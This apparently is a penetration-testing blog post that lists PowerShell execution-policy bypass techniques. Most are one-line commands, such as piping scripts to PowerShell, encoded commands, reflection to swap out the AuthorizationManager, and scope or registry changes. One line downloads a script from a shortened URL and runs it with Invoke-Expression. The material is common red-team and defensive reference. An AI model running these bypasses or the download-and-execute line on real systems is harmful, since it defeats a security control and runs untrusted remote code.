---
layout: post
title: "bypass exec policy"
tags: pt
---
shamelessly plugged from [15 ways](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) (all credits to them)  
  
[ref on exec policy](http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html)
    
  
Echo the Script and Pipe it to PowerShell Standard In
```
Echo Write-Host "My voice is my passport, verify me." | PowerShell.exe -noprofile -
```
  

Read Script from a File and Pipe to PowerShell Standard In
```
Get-Content .runme.ps1 | PowerShell.exe -noprofile -
```
```
TYPE .runme.ps1 | PowerShell.exe -noprofile -
```
  

Download Script from URL and Execute with Invoke Expression
```
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://bit.ly/1kEgbuH')"
```
  

Use the Command Switch
```
Powershell -command "Write-Host 'My voice is my passport, verify me.'"
```
```
Powershell -c "Write-Host 'My voice is my passport, verify me.'"
```
  

Use the EncodeCommand Switch
```
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
```
powershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAcwBwAG8AcgB0ACwAIAB2AGUAcgBpAGYAeQAgAG0AZQAuACcA
```
  

Use the Invoke-Command Command
```
invoke-command -scriptblock {Write-Host "My voice is my passport, verify me."}
```
```
invoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force
```
  

Use the Invoke-Expression Command
```
Get-Content .runme.ps1 | Invoke-Expression
```
```
GC .runme.ps1 | iex
```
  

Use the “Bypass” Execution Policy Flag
```
PowerShell.exe -ExecutionPolicy Bypass -File .runme.ps1
```
  

Use the “Unrestricted” Execution Policy Flag
```
PowerShell.exe -ExecutionPolicy UnRestricted -File .runme.ps1
```
  

Use the “Remote-Signed” Execution Policy Flag
```
PowerShell.exe -ExecutionPolicy Remote-signed -File .runme.ps1
```
  

Disable ExecutionPolicy by Swapping out the AuthorizationManager
[ref](http://www.nivot.org/)
```
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))}  Disable-ExecutionPolicy  .runme.ps1
```
  

Set the ExecutionPolicy for the Process Scope
[ref](http://roo7break.co.uk/?page_id=611)
```
Set-ExecutionPolicy Bypass -Scope Process
```

Set the ExecutionPolicy for the CurrentUser Scope via Command
[ref](http://roo7break.co.uk/?page_id=611)
```
Set-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted
```
  

Set the ExecutionPolicy for the CurrentUser Scope via the Registry
```
HKEY_CURRENT_USER\Software\MicrosoftPowerShell\1\ShellIds\Microsoft.PowerShell
```
use regedit